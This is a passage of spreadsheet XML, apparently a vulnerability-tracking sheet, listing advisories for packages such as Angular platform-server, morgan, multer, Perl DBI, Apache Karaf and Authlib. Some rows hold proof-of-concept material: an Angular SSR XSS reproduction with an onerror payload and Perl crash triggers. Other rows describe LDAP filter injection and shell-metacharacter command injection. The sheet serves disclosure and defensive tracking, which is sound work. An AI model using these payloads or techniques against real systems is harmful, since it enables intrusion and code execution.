      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D362" s="5" t="inlineStr"/>
      <c r="E362" s="5" t="inlineStr"/>
      <c r="F362" s="5" t="inlineStr"/>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M362" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr"/>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Skipper has OPA body-authz bypass: truncated_body mitigation fails open on chunked/HTTP-2 (incomplete fix GHSA-8qqm-fp2q-v734) in github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="D363" s="5" t="inlineStr"/>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>npm:morgan</t>
        </is>
      </c>
      <c r="M363" s="5" t="inlineStr">
        <is>
          <t>1.12.1</t>
        </is>
      </c>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr"/>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>### Impact
Morgan writes attacker-controlled request data to the access log. Its escaping (added in 1.11.0 and 1.12.0) neutralizes control characters, the Unicode line separators, and backslash, but not the double quote (`0x22`), which is the field delimiter of the Apache combined log format morgan emits. An attacker who controls a quoted field (`:user-agent`, `:referrer`, the request URL, or the Basic auth `:remote-user`) can inject a double quote to close the field early and forge additional fields in the log record. The `combined`, `common`, and `default` formats, and any custom format that quotes a token, are affected. This is an incomplete fix of CVE-2026-5078 and CVE-2026-15603.
### Patches
Users should upgrade to version 1.12.1.
### Workarounds
Update to version 1.12.1.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="D364" s="5" t="inlineStr"/>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M364" s="5" t="inlineStr">
        <is>
          <t>20.3.30, 21.2.22, 22.1.4</t>
        </is>
      </c>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr"/>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>### Summary
An XSS vulnerability exists in `@angular/platform-server` during server-side rendering (SSR) HTML serialization of `ProcessingInstruction` DOM nodes (`&lt;?target data?&gt;`, `nodeType === 7`) when nested inside fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`). While processing instruction data escaped `&gt;` to `&amp;gt;`, it did not check for or escape matching closing tags of ancestor fallback elements (e.g., `&lt;/noscript&gt;`). When rendered in a browser with scripting enabled, an unescaped closing tag sequence in a processing instruction prematurely closes the fallback raw-content tag and causes subsequent sibling elements to execute as live HTML.
### Technical Description
In HTML5 parsing, fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`) place the browser's HTML tokenizer into `RAWTEXT` mode. In `RAWTEXT` mode, processing instruction tokens (`&lt;?...?&gt;`) are treated as literal raw text rather than bogus comments, and the parser ignores `&gt;` or `?&gt;`. The only token sequence that terminates the container is an end tag matching the container tag name (`&lt;/noscript`, `&lt;/iframe`, etc.).
During server-side HTML serialization, processing instruction nodes previously only replaced `&gt;` with `&amp;gt;` (preventing bogus comment breakouts in normal HTML data states) but left `&lt;` untouched. Crucially, processing instruction serialization never inspected ancestor fallback raw-content tags. As a result, if a `ProcessingInstruction` node inside `&lt;noscript&gt;` contained `&lt;/noscript ` in its data payload, it was emitted unescaped as `&lt;?x &lt;/noscript ?&gt;`.
### Impact &amp; Reachability
* **Reachability**: Processing instruction nodes cannot be authored directly through standard Angular template syntax (which parses `&lt;?...&gt;` into comment nodes in DOM position). Reaching this vulnerability requires application or library code calling `inject(DOCUMENT).createProcessingInstruction(target, data)` or `Renderer2` DOM insertion methods with untrusted user input passed to `data` inside a fallback raw-content container.
* **Impact**: In applications that programmatically construct processing instruction nodes inside fallback elements during server-side rendering, an attacker controlling the processing instruction data can break out of the container and execute arbitrary JavaScript in victims' browsers.
### Proof of Concept (Minimal Reproduction)
```ts
import { Component, ElementRef, Renderer2, inject, DOCUMENT, AfterViewInit } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;noscript id="host"&gt;&lt;/noscript&gt;`
})
export class AppComponent implements AfterViewInit {
  private r = inject(Renderer2);
  private el = inject(ElementRef);
  private doc = inject(DOCUMENT);
  ngAfterViewInit() {
    const host = this.el.nativeElement.querySelector('#host');
    // Attacker-controlled input passed as Processing Instruction data
    const pi = this.doc.createProcessingInstruction('x', '&lt;/noscript ');
    this.r.appendChild(host, pi);
    // Sibling markup that should remain inert inside &lt;noscript&gt;
    const img = this.r.createElement('img');
    this.r.setAttribute(img, 'src', 'x');
    this.r.setAttribute(img, 'onerror', 'alert("SSR_PI_XSS")');
    this.r.appendChild(host, img);
  }
}
```
**Vulnerable SSR Output**:
```html
&lt;noscript&gt;&lt;?x &lt;/noscript ?&gt;&lt;img src="x" onerror="alert('SSR_PI_XSS')"&gt;&lt;/noscript&gt;
```
### Workarounds
* Avoid passing untrusted user input into `document.createProcessingInstruction(target, data)` when the node is inserted into `&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, or `&lt;noframes&gt;` during server-side rendering.
* Manually sanitize or replace `&lt;` with `&amp;lt;` in any untrusted data passed to processing instruction nodes on the server.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88815</t>
        </is>
      </c>
      <c r="D365" s="5" t="inlineStr"/>
      <c r="E365" s="5" t="inlineStr"/>
      <c r="F365" s="5" t="inlineStr"/>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>DBI versions before 1.654 for Perl incorrectly treat numeric values as strings in sql_type_cast_svpv.
When casting to SQL_NUMERIC, sql_type_cast_svpv passes the string pointer and length of the SV to grok_number without stringifying it first. An integer (IV) or floating-point (NV) value has no valid string pointer, so grok_number reads from an invalid address, triggering a segmentation fault.
This is reachable in Perl using the sql_type_cast function:
  my $num = 42;
  DBI::sql_type_cast( $num, DBI::SQL_NUMERIC, 0 );</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88815</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88816</t>
        </is>
      </c>
      <c r="D366" s="5" t="inlineStr"/>
      <c r="E366" s="5" t="inlineStr"/>
      <c r="F366" s="5" t="inlineStr"/>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>DBI versions before 1.654 for Perl incorrectly treat numeric values as strings in FetchHashKeyName.
fetchrow_hashref uses the string pointer of the FetchHashKeyName attribute as the key name without stringifying it first. When FetchHashKeyName has been set to an integer (IV) or floating-point (NV) value, that pointer is invalid, so reading the key name triggers a segmentation fault.
This can be triggered with the following code:
   my $dbh = DBI-&gt;connect( "dbi:ExampleP:", "", "",
       { RaiseError =&gt; 0, PrintError =&gt; 0 } );
   $dbh-&gt;{FetchHashKeyName} = 42;
   my $sth = $dbh-&gt;prepare("select mode, size, name from .");
   $sth-&gt;execute;
   $sth-&gt;fetchrow_hashref;</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88816</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88932</t>
        </is>
      </c>
      <c r="D367" s="5" t="inlineStr"/>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M367" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr"/>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>### Impact
Multer's `diskStorage` can leave complete, orphaned files on disk when a multipart upload is aborted in the brief window before the storage engine assigns the file path. This is an incomplete fix of CVE-2026-5038: the earlier cleanup removes only in-flight uploads that already have a path, so an upload aborted inside that window is written to disk with nothing left to remove it, and the application is not given a handle to clean it up. An unauthenticated attacker sending aborted requests to any route backed by disk storage can accumulate orphaned files until the upload directory or the shared system temporary directory is exhausted. An asynchronous `destination` or `filename` widens the window.
### Patches
Users should upgrade to `2.4.0` or higher.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88932</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9029</t>
        </is>
      </c>
      <c r="D368" s="5" t="inlineStr"/>
      <c r="E368" s="5" t="inlineStr"/>
      <c r="F368" s="5" t="inlineStr"/>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr"/>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>Grafana geomap panel's XYZ tile layer has a sanitize-then-interpolate ordering bug in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9029</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90979</t>
        </is>
      </c>
      <c r="D369" s="5" t="inlineStr"/>
      <c r="E369" s="5" t="inlineStr"/>
      <c r="F369" s="5" t="inlineStr"/>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>sap, gin</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>LDAPCache and LDAPBackingEngine build LDAP search filters for user lookup and role lookup by textually substituting the placeholders %u, %dn, and %fqdn (drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter, roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed:
filter = filter.replaceAll(Pattern.quote("%u"), Matcher.quoteReplacement(user));
filter = filter.replace("\\", "\\\\");
This does not escape the other characters RFC 4515 requires escaping in an LDAP search filter: *, (, ), and NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.
It's not exploitable through every entry points: LDAPLoginModule and LDAPPubkeyLoginModule both called Util.doRFC2254Encoding() (correct RFC 4515 escaping) on the login name before handing it to LDAPCache, which masked the missing escaping in LDAPCache for those two call paths. Using LDAPCache directly (bypassing the login modules) does not reproduce through the normal LDAPLoginModule/LDAPPubkeyLoginModule authentication flow for this reason. It does reproduce through two other call paths that reach LDAPCache/LDAPBackingEngine without any prior escaping:
  *  GSSAPILdapLoginModule passes the NameCallback name straight through, unescaped.
  *  LDAPBackingEngine (listRoles) passes principal.getName() straight through, unescaped.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90979</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91006</t>
        </is>
      </c>
      <c r="D370" s="5" t="inlineStr"/>
      <c r="E370" s="5" t="inlineStr"/>
      <c r="F370" s="5" t="inlineStr"/>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Apache Karaf's instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through /bin/sh (Unix) or cscript (Windows). The caller-supplied javaOpts value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;, |, `, $(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.
Reachable via the shell commands instance:create, instance:start, instance:restart, instance:change-opts, and the equivalent InstanceMBean JMX operations (createInstance, startInstance, changeJavaOpts, cloneInstance).
Mitigation   *  Set karaf.secured.command.compulsory.roles=admin in etc/system.properties to close the fail-open gap for all unconfigured command scopes.
  *  Restrict which principals can reach instance:* commands and InstancesMBean via etc/users.properties role assignments.
  *  Treat javaOpts passed to instance:create/instance:start/instance:change-opts/InstancesMBean as untrusted input only from fully-trusted operators.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91006</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91095</t>
        </is>
      </c>
      <c r="D371" s="5" t="inlineStr"/>
      <c r="E371" s="5" t="inlineStr"/>
      <c r="F371" s="5" t="inlineStr"/>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr"/>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>In proxygen from v2024.10.28.00 until v2026.09.28.00, the HTTPTransaction::onWebTransportUniStream and HTTPTransaction::onWebTransportBidiStream APIs could return stream handles that the stream handler had already freed. HQSession then installed those handles as transport read callbacks, which could lead to use of freed memory.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91095</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91096</t>
        </is>
      </c>
      <c r="D372" s="5" t="inlineStr"/>
      <c r="E372" s="5" t="inlineStr"/>
      <c r="F372" s="5" t="inlineStr"/>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr"/>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>In proxygen from v2024.10.28.00 until v2026.09.28.00, WebTransportImpl::terminateSessionStreams (WebTransportImpl::destroy in releases before v2025.08.18.00) failed to unregister read callbacks for streams that were no longer open before destroying them. The transport could then invoke a read callback that had been freed.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91096</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9162</t>
        </is>
      </c>
      <c r="D373" s="5" t="inlineStr"/>
      <c r="E373" s="5" t="inlineStr"/>
      <c r="F373" s="5" t="inlineStr"/>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M373" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr"/>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't invalidate cached authentication state for active WebSocket connections during global session revocation in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9162</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96760</t>
        </is>
      </c>
      <c r="D374" s="5" t="inlineStr"/>
      <c r="E374" s="5" t="inlineStr"/>
      <c r="F374" s="5" t="inlineStr"/>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr"/>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Authlib (v1.7.2 and below) contains a signature verification bypass vulnerability. The JsonWebSignature.deserialize_json() method accepts a JSON Serialization JWS object and returns the payload as successfully verified without checking for a signature and without requiring a cryptographic key.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96760</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>GHSA-2gr6-gxvx-3594</t>
        </is>
      </c>
      <c r="D375" s="5" t="inlineStr"/>
      <c r="E375" s="5" t="inlineStr"/>
      <c r="F375" s="5" t="inlineStr"/>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr">
        <is>
          <t>npm:nebulajs-api</t>
        </is>
      </c>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr"/>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
